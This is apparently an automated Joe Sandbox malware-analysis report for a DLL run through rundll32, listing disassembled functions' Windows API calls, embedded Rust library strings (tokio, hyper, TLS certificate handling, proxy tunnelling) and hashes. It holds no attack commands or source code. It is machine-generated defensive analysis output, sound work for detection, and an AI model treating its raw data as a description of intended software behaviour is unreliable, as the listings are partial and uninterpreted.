                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemmovememset
                              • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                              • API String ID: 2639809894-356128008
                              • Opcode ID: da5b132e608e21cf6c68c107e82b860df482aea01baaf3c89edb0f069208b4b2
                              • Instruction ID: 8fb14af3e02b37b3ea967a6a615a51fb5bf9f9c26b09b8811d2fdb556b75a93b
                              • Opcode Fuzzy Hash: da5b132e608e21cf6c68c107e82b860df482aea01baaf3c89edb0f069208b4b2
                              • Instruction Fuzzy Hash: 07C10370E006588BDF10DFAAC9947EEBBB4AF49314F20C129D815B7B90FB748949CB90
                              APIs
                              • SetLastError.KERNEL32(00000000), ref: 6CC50227
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CC50232
                              • GetLastError.KERNEL32 ref: 6CC5023E
                              • GetCurrentProcess.KERNEL32 ref: 6CC5046B
                              • GetCurrentThread.KERNEL32 ref: 6CC50473
                              • memset.VCRUNTIME140(?,00000000,000002D0), ref: 6CC5048A
                              • RtlCaptureContext.KERNEL32(?), ref: 6CC50493
                                • Part of subcall function 6CC4C9B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6CC4C9F0
                                • Part of subcall function 6CC4C9B0: LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6CC4CA04
                                • Part of subcall function 6CC4C9B0: GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6CC4CA36
                                • Part of subcall function 6CC4C9B0: GetProcAddress.KERNEL32(SymSetOptions), ref: 6CC4CA64
                                • Part of subcall function 6CC4C9B0: GetProcAddress.KERNEL32(SymInitializeW), ref: 6CC4CA93
                                • Part of subcall function 6CC4C9B0: GetCurrentProcess.KERNEL32(SymInitializeW), ref: 6CC4CAB1
                                • Part of subcall function 6CC4C9B0: memset.VCRUNTIME140(00000000,00000000,000007FE), ref: 6CC4CB04
                              • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6CC504C9
                              • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6CC504F2
                              • GetCurrentProcess.KERNEL32(SymGetModuleBase64), ref: 6CC50506
                              • GetProcAddress.KERNEL32(StackWalkEx), ref: 6CC50528
                              • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC5054B
                              • ReleaseMutex.KERNEL32(?), ref: 6CC50651
                              • memset.VCRUNTIME140(?,00000000,00000100,StackWalkEx), ref: 6CC506DD
                              • GetProcAddress.KERNEL32(StackWalk64), ref: 6CC50784
                              • GetLastError.KERNEL32 ref: 6CC50253
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              Strings
                              • SymGetModuleBase64, xrefs: 6CC504E7
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC50808
                              • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CC50678
                              • SymFunctionTableAccess64, xrefs: 6CC504BE
                              • stack backtrace:, xrefs: 6CC503F0
                              • StackWalk64, xrefs: 6CC50779
                              • StackWalkEx, xrefs: 6CC5051D
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$Current$memset$ErrorLastProcess$CaptureContextDirectoryFreeHeapLibraryLoadMutexObjectReleaseSingleThreadWait
                              • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                              • API String ID: 3073563537-3001507533
                              • Opcode ID: 7b72269100d51c6d28e9f590a4c76c3fcf6814794bf8ebba715d8a9f96abf108
                              • Instruction ID: f17eeca277376dc92c089f84df32e9d3da52cc91f5d7a0b163051673bc0f13b9
                              • Opcode Fuzzy Hash: 7b72269100d51c6d28e9f590a4c76c3fcf6814794bf8ebba715d8a9f96abf108
                              • Instruction Fuzzy Hash: 792234B0500B808FD7608F26C994B93BBF4BF49308F504A1DD8EA87B81EB75B559CB95
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC387FA
                                • Part of subcall function 6CC46A27: memmove.VCRUNTIME140(?,00000000,?,?,?,6CC38843), ref: 6CC46A5D
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC38955
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38C1C
                                • Part of subcall function 6CC4738F: CertDuplicateCertificateContext.CRYPT32(?), ref: 6CC47390
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC38A75
                              • FreeContextBuffer.SECUR32(?), ref: 6CC38AB0
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC38B32
                                • Part of subcall function 6CC472E6: CertDuplicateStore.CRYPT32(?), ref: 6CC472E7
                                • Part of subcall function 6CC35A78: memmove.VCRUNTIME140(?,?,00000160,?,?,?,00000000,?,6CC38BE8), ref: 6CC35AA7
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38C39
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38C9A
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38CB8
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38CE7
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38D04
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38D2E
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38D4C
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC38D7B
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC38D98
                              Strings
                              • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CC38DB5
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$CertContextDuplicate$BufferCertificateFreeStore
                              • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                              • API String ID: 3250603675-1242699868
                              • Opcode ID: f2d44fb79868f020da4a980d5b7bc2f86b899941ab26502bb3ad3e230519424e
                              • Instruction ID: 01e1b6210cda1c2f68dc88d61abae0cf817432d178a598ed1777a1e2712e0cd0
                              • Opcode Fuzzy Hash: f2d44fb79868f020da4a980d5b7bc2f86b899941ab26502bb3ad3e230519424e
                              • Instruction Fuzzy Hash: 8C028CB1908341DFD765CF25C484B9ABBE4FF88314F04896EE8888B745E774E949CB92
                              APIs
                              • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,?,6CBF6DA6,?,?,?,?,?,?,6CC63E7A), ref: 6CC6405E
                              • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6CC64070
                              • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6CC64081
                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,6CBF6DA6,?,?,?,?,?,?,6CC63E7A), ref: 6CC64095
                              • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6CC640AB
                              • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6CC640C0
                              • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6CC640D1
                              • CloseHandle.KERNEL32(?,?,C0000000,00000000,00000000,00000000,NtWaitForKeyedEvent,00000000,NtReleaseKeyedEvent,?,?,?,?,?,6CBF6DA6), ref: 6CC64124
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$Handle$Module$Close
                              • String ID: NtCreateKeyedEvent$NtReleaseKeyedEvent$NtWaitForKeyedEvent$WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0.dll$ntdll.dll
                              • API String ID: 3875313662-3409541999
                              • Opcode ID: 027fac6cc8500ea22a4e39e4a0c35fd94ab860a12170d9761b54c98881f87a74
                              • Instruction ID: d7246dbf30c4480f327d7cc98206787e2e7166568124e30b04d666fe58407bc6
                              • Opcode Fuzzy Hash: 027fac6cc8500ea22a4e39e4a0c35fd94ab860a12170d9761b54c98881f87a74
                              • Instruction Fuzzy Hash: 725101713412209BE711CB67CE94B1677E4AF92368F298128EA15EBE90FB75CC42C790
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6CC509F5
                              • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CC50A15
                              • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CC50A44
                              • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6CC50A8D
                              • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CC50AB8
                              • memset.VCRUNTIME140(?,00000000,00000FF4), ref: 6CC50C41
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000007CF,00000000,00000100,00000000,00000000), ref: 6CC50D46
                              Strings
                              • SymGetLineFromInlineContextW, xrefs: 6CC50A39
                              • SymAddrIncludeInlineTrace, xrefs: 6CC50A82
                              • SymQueryInlineTrace, xrefs: 6CC50AAD
                              • __rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CC510AE
                              • SymFromInlineContextW, xrefs: 6CC50A0A
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$ByteCharCurrentMultiProcessWidememset
                              • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]
                              • API String ID: 3228588488-600644135
                              • Opcode ID: 11e1d69c53c80fd14577a45b1e0e67197801811c66f66cf149ef595da236d06a
                              • Instruction ID: aed5ba260d956f07d1dd170997290cce48b9e5350ef0f2fdc1ce6f6206282116
                              • Opcode Fuzzy Hash: 11e1d69c53c80fd14577a45b1e0e67197801811c66f66cf149ef595da236d06a
                              • Instruction Fuzzy Hash: D9322870A00B808FE321CF25C985B93B7F1BF99308F508A1DD9EA97A51E771B995CB50
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000BC), ref: 6CC3EDCD
                              • memmove.VCRUNTIME140(000000C4,?,0000009C), ref: 6CC3EDED
                                • Part of subcall function 6CC35A78: memmove.VCRUNTIME140(?,?,00000160,?,?,?,00000000,?,6CC38BE8), ref: 6CC35AA7
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC3EE59
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC3EE76
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC3EEA9
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC3EEC7
                              • memmove.VCRUNTIME140(?,?,000000B4), ref: 6CC3EEEA
                              • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CC3EF0E
                              Strings
                              • future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs, xrefs: 6CC3EFB1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: future polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-native-tls-0.3.1\src\lib.rs
                              • API String ID: 2162964266-1242699868
                              • Opcode ID: c91dee3de3ae8d751f87c823fdefbf4f0911dc3f5b96ee2cc7e5743ab83155ca
                              • Instruction ID: afeec7b70ebdc6499aeac054ad24bc19edc05fc38114396d07ece6c86de565ec
                              • Opcode Fuzzy Hash: c91dee3de3ae8d751f87c823fdefbf4f0911dc3f5b96ee2cc7e5743ab83155ca
                              • Instruction Fuzzy Hash: F6513EB2904305ABE725CB55D981FEBB7A8FF88704F04892DE55987781F734E908CB92
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _memset$_wcsrchr
                              • String ID: D
                              • API String ID: 170005318-2746444292
                              • Opcode ID: 816ba07bf096ff89473f450edf8bc183bb27a2ec5172381af2beb10de3a9835c
                              • Instruction ID: c0963c4c733acc3df27d3129a2705daf599ade1283cb241b957d93867812e5b3
                              • Opcode Fuzzy Hash: 816ba07bf096ff89473f450edf8bc183bb27a2ec5172381af2beb10de3a9835c
                              • Instruction Fuzzy Hash: 0351CBB194032DBAEB20EB60CD85FEE73789F14704F404599E70AEA180FB71B644CBA5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: __aulldiv$ErrorLastPerformanceQuery$CounterFrequency
                              • String ID: called `Result::unwrap()` on an `Err` value
                              • API String ID: 10619572-2333694755
                              • Opcode ID: 6e8490e604a5d195a334899da9f89a19af64ae6e8b4b348bf2953e210ded0c70
                              • Instruction ID: 6c3f91bbc97c04592905b47b6dbffbc2607971e5a62fc543fc9ab823385c7d35
                              • Opcode Fuzzy Hash: 6e8490e604a5d195a334899da9f89a19af64ae6e8b4b348bf2953e210ded0c70
                              • Instruction Fuzzy Hash: 1A514AB1600B008FC724DF69C944B53FBF9AB88714F148A2EE49A97F50E774F4098B91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: _memset$_malloc
                              • String ID: ($6$gfff$gfff
                              • API String ID: 3506388080-713438465
                              • Opcode ID: 45c258d321b0b7250ec73ddfe6f5768bca881061f444038ed1c726861de6cd5e
                              • Instruction ID: 216b07d777c99ca3620bae6f881518d5c6ddfc5308d1112b5d298b2b623b2259
                              • Opcode Fuzzy Hash: 45c258d321b0b7250ec73ddfe6f5768bca881061f444038ed1c726861de6cd5e
                              • Instruction Fuzzy Hash: 58D17CB1E00318AFEB14DFE9D885A9EBBB9FF48700F10412DE506A7251E770B905CBA5
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0F274
                              • memmove.VCRUNTIME140(?,?,00000220), ref: 6CC0F28B
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC0F2F6
                              • memmove.VCRUNTIME140(?,?,000000C8), ref: 6CC0F30D
                              • memmove.VCRUNTIME140(?,?,00000168), ref: 6CC0F35A
                              Strings
                              • HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel, xrefs: 6CC0EBB6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel
                              • API String ID: 2162964266-2977587669
                              • Opcode ID: 42bb8f862aa6e3fd56cb3cbad952c3070d3bebc1886bfe85a6a8a063cf0c681c
                              • Instruction ID: b78b6ce5831d0ad72da52fa643dd12d8e286e9d60d34aeee8d6a7b9773e8de5f
                              • Opcode Fuzzy Hash: 42bb8f862aa6e3fd56cb3cbad952c3070d3bebc1886bfe85a6a8a063cf0c681c
                              • Instruction Fuzzy Hash: 19D1F2306087459FD715CF24C498BDAB7E1FF44308F18856EE89D8B791E732A989CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,0000010C), ref: 6CC1A494
                              • memmove.VCRUNTIME140(?,?,0000010C), ref: 6CC1A4BC
                              • memmove.VCRUNTIME140(?,?,0000002B), ref: 6CC1A604
                              Strings
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC1A6BF
                              • HTTP/2 connection in progressD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.32\src\common\lazy.rs, xrefs: 6CC1A4F3
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: HTTP/2 connection in progressD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.32\src\common\lazy.rs$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-2665790016
                              • Opcode ID: 1355bb7b342c1b6ec00c2ce26812588080b948c51796692c664aa68bb4ee3bec
                              • Instruction ID: d73e909414e0430eaf528e64d3035d4e7a6f137cd5be6048665dae8744def87d
                              • Opcode Fuzzy Hash: 1355bb7b342c1b6ec00c2ce26812588080b948c51796692c664aa68bb4ee3bec
                              • Instruction Fuzzy Hash: E471B1329087409BCB51CF25C480ADBB7E5AFC9314F04896EE8999FA81EB70D54DDB92
                              APIs
                              • __CreateFrameInfo.LIBCMT ref: 0467FF90
                                • Part of subcall function 0467FA76: __getptd.LIBCMT ref: 0467FA84
                                • Part of subcall function 0467FA76: __getptd.LIBCMT ref: 0467FA92
                              • __getptd.LIBCMT ref: 0467FF9A
                                • Part of subcall function 04673800: __getptd_noexit.LIBCMT ref: 04673803
                                • Part of subcall function 04673800: __amsg_exit.LIBCMT ref: 04673810
                              • __getptd.LIBCMT ref: 0467FFA8
                              • __getptd.LIBCMT ref: 0467FFB6
                              • __getptd.LIBCMT ref: 0467FFC1
                              • _CallCatchBlock2.LIBCMT ref: 0467FFE7
                                • Part of subcall function 0467FB1B: __CallSettingFrame@12.LIBCMT ref: 0467FB67
                                • Part of subcall function 0468008E: __getptd.LIBCMT ref: 0468009D
                                • Part of subcall function 0468008E: __getptd.LIBCMT ref: 046800AB
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                              • String ID:
                              • API String ID: 1602911419-0
                              • Opcode ID: 140e0ecad3f6b823f00cca1794e70136b3e8d5fc798de5bcffb231a482b4ed6d
                              • Instruction ID: 2b6e076a857263dfa1f971dcfe8a0473c53bb9b33470f4c5a0a09cb9f233f278
                              • Opcode Fuzzy Hash: 140e0ecad3f6b823f00cca1794e70136b3e8d5fc798de5bcffb231a482b4ed6d
                              • Instruction Fuzzy Hash: 8311C9B1D01209DFEB00EFA4D844AAE7BB0FF04318F118569E814A7350EB39A955DB55
                              APIs
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC36AFE
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC36B20
                              • CertFreeCertificateChain.CRYPT32(?), ref: 6CC36B32
                              Strings
                              • unable to find any user-specified roots in the final cert chain, xrefs: 6CC36B60
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CertCertificateFree$Context$Chain
                              • String ID: unable to find any user-specified roots in the final cert chain
                              • API String ID: 1586265559-2994100780
                              • Opcode ID: 379054d62f913180ae92d07e10af56e8b95379dad41e3811e974192944e004d6
                              • Instruction ID: b93036af93cd9bc4d2d00d2c7086ea33173f4747fbe38ffbefee835c0f6e5409
                              • Opcode Fuzzy Hash: 379054d62f913180ae92d07e10af56e8b95379dad41e3811e974192944e004d6
                              • Instruction Fuzzy Hash: 2A317A316087109BC304DF25D980A5EBBF1BF89318F14C869E9888B750EB31DC89DB52
                              APIs
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC4D096
                              • TryFromIntErrorOS can't spawn worker thread: , xrefs: 6CC4D0DA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: lstrlenmemcmp
                              • String ID: TryFromIntErrorOS can't spawn worker thread: $called `Result::unwrap()` on an `Err` value
                              • API String ID: 1799893992-1221440643
                              • Opcode ID: 3487c73a01923965479b6a678ec0ccab5a38b6a827eb87b16e4dcec18cdec15a
                              • Instruction ID: d53045d42c055c2d7e6017b12febd06dbe4bc3a14a9eaba211d430236f461a7e
                              • Opcode Fuzzy Hash: 3487c73a01923965479b6a678ec0ccab5a38b6a827eb87b16e4dcec18cdec15a
                              • Instruction Fuzzy Hash: CE81A471E002099FCB14DF99C841AAEB7B6FF88358F24C129E815A7B61F735E945CB90
                              APIs
                              • __getptd.LIBCMT ref: 046749B1
                                • Part of subcall function 04673800: __getptd_noexit.LIBCMT ref: 04673803
                                • Part of subcall function 04673800: __amsg_exit.LIBCMT ref: 04673810
                              • __getptd.LIBCMT ref: 046749C8
                              • __amsg_exit.LIBCMT ref: 046749D6
                              • __lock.LIBCMT ref: 046749E6
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 046749FA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3544730523.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4660000_rundll32.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 280a9a565fc38ed5b47a2f998a82c103bd79174b764588edcd66638793cc0719
                              • Instruction ID: 751eb702b47c613ac13ace45cd0b7456477734045352cc989635f618e640f94a
                              • Opcode Fuzzy Hash: 280a9a565fc38ed5b47a2f998a82c103bd79174b764588edcd66638793cc0719
                              • Instruction Fuzzy Hash: 00F09032941320DAF760FB78980975E77A0AF00728F25410ED9246B3C1FF387991EA9E
                              APIs
                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6CC46FF3
                              • memmove.VCRUNTIME140(-0000000A,?,00000000), ref: 6CC47068
                              • InitializeSecurityContextW.SECUR32(?,00000000,?,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CC471EE
                              Strings
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC470A7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
